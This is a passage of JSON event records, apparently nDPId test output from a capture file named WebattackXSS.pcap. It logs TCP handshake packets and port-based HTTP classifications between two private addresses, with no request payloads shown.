+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1499347309314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347309314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0V4tAAD4Gbk2sEAABwKgKMtoMAFADiWIH7XEpb4AQAOVmcgAAAQEICgE6NYwD5AcC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347310567,"flow_last_seen":1499347310567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347310567,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1499347310567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347310567,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8riNAAD4GF62sEAABwKgKMtoaAFDhF5jmAAAAAKACchDSmwAAAgQFtAQCCAoBOjbFAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":2,"flow_last_seen":1499347310567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347310567,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2hoggEnh4ReY56AScSBc+gAAAgQFtAQCCAoD5Ag7ATo2xQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":3,"flow_last_seen":1499347310567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347310567,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0riRAAD4GF7SsEAABwKgKMtoaAFDhF5jnIIBJ4oAQAOX8AQAAAQEICgE6NsUD5Ag7"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347313106,"flow_last_seen":1499347313106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313106,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1499347313106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80LNAAD4G9RysEAABwKgKMto0AFBr7OnzAAAAAKACchD0JAAAAgQFtAQCCAoBOjlAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1499347313106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347313106,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2jRgNfxEa+zp9KAScSCJ7wAAAgQFtAQCCAoD5Aq2ATo5QAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1499347313106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00LRAAD4G9SOsEAABwKgKMto0AFBr7On0YDX8RYAQAOUo9wAAAQEICgE6OUAD5Aq2"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347314358,"flow_last_seen":1499347314358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347314358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1499347314358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347314358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wpZAAD4GAzqsEAABwKgKMtpCAFAntfjvAAAAAKACchAoGQAAAgQFtAQCCAoBOjp5AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":2,"flow_last_seen":1499347314358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347314358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2kLsSHY8J7X48KAScSC2nwAAAgQFtAQCCAoD5AvvATo6eQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1499347314359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347314359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wpdAAD4GA0GsEAABwKgKMtpCAFAntfjw7Eh2PYAQAOVVpwAAAQEICgE6OnkD5Avv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347315631,"flow_last_seen":1499347315631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347315631,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1499347315631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347315631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8y+VAAD4G+eqsEAABwKgKMtpQAFAKdfBSAAAAAKACchBMqgAAAgQFtAQCCAoBOju3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1499347315631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347315631,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2lDsZegJCnXwU6AScSBoCAAAAgQFtAQCCAoD5A0tATo7twEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":3,"flow_last_seen":1499347315631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347315631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0y+ZAAD4G+fGsEAABwKgKMtpQAFAKdfBT7GXoCoAQAOUHEAAAAQEICgE6O7cD5A0t"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347318180,"flow_last_seen":1499347318180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347318180,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1499347318180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347318180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81llAAD4G73asEAABwKgKMtpqAFAYI+htAAAAAKACchBESgAAAgQFtAQCCAoBOj40AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":1499347318180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347318180,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2mqVHZfsGCPobqAScSAEkQAAAgQFtAQCCAoD5A+qATo+NAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":3,"flow_last_seen":1499347318181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347318181,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01lpAAD4G732sEAABwKgKMtpqAFAYI+hulR2X7YAQAOWjmAAAAQEICgE6PjQD5A+q"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347319466,"flow_last_seen":1499347319466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347319466,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1499347319466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347319466,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vPhAAD4GCNisEAABwKgKMtp4AFBaBoOOAAAAAKACchBl9gAAAgQFtAQCCAoBOj92AAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":2,"flow_last_seen":1499347319466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347319466,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ni9VjICWgaDj6AScSBirAAAAgQFtAQCCAoD5BDsATo\/dgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":3,"flow_last_seen":1499347319467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347319467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vPlAAD4GCN+sEAABwKgKMtp4AFBaBoOPvVYyA4AQAOUBtAAAAQEICgE6P3YD5BDs"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347320712,"flow_last_seen":1499347320712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347320712,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1499347320712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347320712,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tK5AAD4GESKsEAABwKgKMtqGAFAqvPQDAAAAAKACchAjhgAAAgQFtAQCCAoBOkCtAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1499347320712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347320712,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2oZaSFgWKrz0BKAScSBb\/wAAAgQFtAQCCAoD5BIjATpArQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1499347320712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347320712,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tK9AAD4GESmsEAABwKgKMtqGAFAqvPQEWkhYF4AQAOX7BgAAAQEICgE6QK0D5BIj"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347323234,"flow_last_seen":1499347323234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323234,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1499347323234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347323234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CttAAD4GuvWsEAABwKgKMtqgAFDxkUn\/AAAAAKACchAEJAAAAgQFtAQCCAoBOkMkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1499347323234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347323234,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2qDnEfYn8ZFKAKAScSAPSwAAAgQFtAQCCAoD5BSaATpDJAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":3,"flow_last_seen":1499347323235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347323235,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CtxAAD4GuvysEAABwKgKMtqgAFDxkUoA5xH2KIAQAOWuUgAAAQEICgE6QyQD5BSa"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 